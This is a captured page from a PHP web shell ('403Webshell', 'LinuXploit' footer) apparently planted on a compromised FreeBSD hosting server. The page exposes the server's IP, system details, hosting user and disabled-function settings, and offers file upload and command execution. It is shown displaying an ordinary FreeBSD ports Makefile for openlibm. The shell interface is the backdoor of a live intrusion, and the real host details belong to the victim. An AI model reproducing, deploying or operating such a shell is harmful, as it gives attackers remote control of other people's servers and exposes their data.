403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/math/openlibm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/math/openlibm//Makefile
PORTNAME=	openlibm
DISTVERSIONPREFIX=	v
DISTVERSION=	0.8.0
CATEGORIES=	math

MAINTAINER=	iblis@hs.ntnu.edu.tw
COMMENT=	High quality system independent, portable, open source libm
WWW=		http://julialang.org/openlibm/

LICENSE=	MIT ISCL BSD2CLAUSE
LICENSE_COMB=	multi
LICENSE_FILE=	${WRKSRC}/LICENSE.md

BROKEN_armv6=	fails to compile: a parameter list without types is only allowed in a function definition
BROKEN_armv7=	fails to compile: a parameter list without types is only allowed in a function definition
BROKEN_mips=	fails to compile: No rule to make target mips/Make.files
BROKEN_mips64=	fails to compile: No rule to make target mips64/Make.files
BROKEN_riscv64=	fails to compile: No rule to make target riscv64/Make.files

USES=		gmake
USE_GITHUB=	yes
GH_ACCOUNT=	JuliaMath
USE_LDCONFIG=	yes

.include <bsd.port.options.mk>

.if ${ARCH:Mpowerpc*}
USES+=		compiler:gcc-c++11-lib
.else
USES+=		compiler:c11
.endif

.include <bsd.port.pre.mk>

MAKE_ENV+=	prefix=${PREFIX} ${MAKE_ENV_${CHOSEN_COMPILER_TYPE}}
MAKE_ENV_gcc=	USEGCC=1 USECLANG=0
MAKE_ENV_clang=	USEGCC=0 USECLANG=1

TEST_TARGET=	check

post-patch:
	${REINPLACE_CMD} -e 's/USEGCC =/USEGCC ?=/g' \
		-e 's/USECLANG =/USECLANG ?=/g' \
		-e '/TOOLPREFIX)gcc/s/$$/${GCC_DEFAULT}/g' \
		${WRKSRC}/Make.inc

.include <bsd.port.post.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit